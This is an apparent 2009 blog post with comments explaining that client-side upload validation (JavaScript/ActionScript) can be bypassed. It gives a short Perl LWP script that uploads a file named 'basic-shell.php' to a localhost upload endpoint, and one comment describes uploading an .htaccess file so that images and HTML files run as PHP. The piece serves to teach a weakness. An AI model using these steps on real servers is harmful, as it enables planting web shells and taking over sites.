Bilbao Digital

  Defense and attack. Client side validation using javascript and actionscript.

The dynamic action attribute of the form tag is received from the swf file depending on the file that is being uploaded. We will decompile it for academic purposes. Disabling javascript we block the information exchange and then, add the right action target by editing the HTML form.

Anyhow, an attacker doesn't need any HTML form to upload a file. It can be done, for example, using a Perl script.

#!/usr/bin/perl
use LWP;
use HTTP::Request::Common;
$ua = $ua = LWP::UserAgent->new;
$res = $ua->request(POST 'http://localhost/demo3/upload3.php',
    Content_Type => 'form-data',
    Content => [userfile => ["basic-shell.php", "basic-shell.php"],],);
print $res->as_string();

This is the bottom line of client side validation.

Comentarios (3)

...
escrito por willemkenn , 10, urtarrila, 2009

nice video...have you tried inserting a php shell code in .HTML?

report abuse

vote down

vote up

Votos: +0

...
escrito por Carlos Sánchez , 10, urtarrila, 2009

A php file is interpreted by php process following the Apache AddType directive:

# AddType application/x-httpd-php .php

The AddType directive defines MIME type and file extension pairs. For example, using PHP4, use the AddType directive to make the Web server recognize with PHP file extensions (.php4, .php3 .phtml .php) as PHP MIME types.

To allow the server to read php script inserted into another file extension you must edit the httpd.conf file or, in the hacker side, upload a .htaccess file to the same folder to override the Apache configuration:

AddType application/x-httpd-php .php .jpg .gif .htm .html

Remember to try this on localhost ;-).

report abuse

vote down

vote up

Votos: +8

thanks
escrito por willemkenn , 29, urtarrila, 2009

Thank you...

report abuse

vote down

vote up

Votos: +0

Título
Comentario	menor | mayor
Nombre
Email
Sitio Web
Escribe los caracteres de la imagen
He leído y comprendido los Térmios de Uso.
	Nuevo Comentario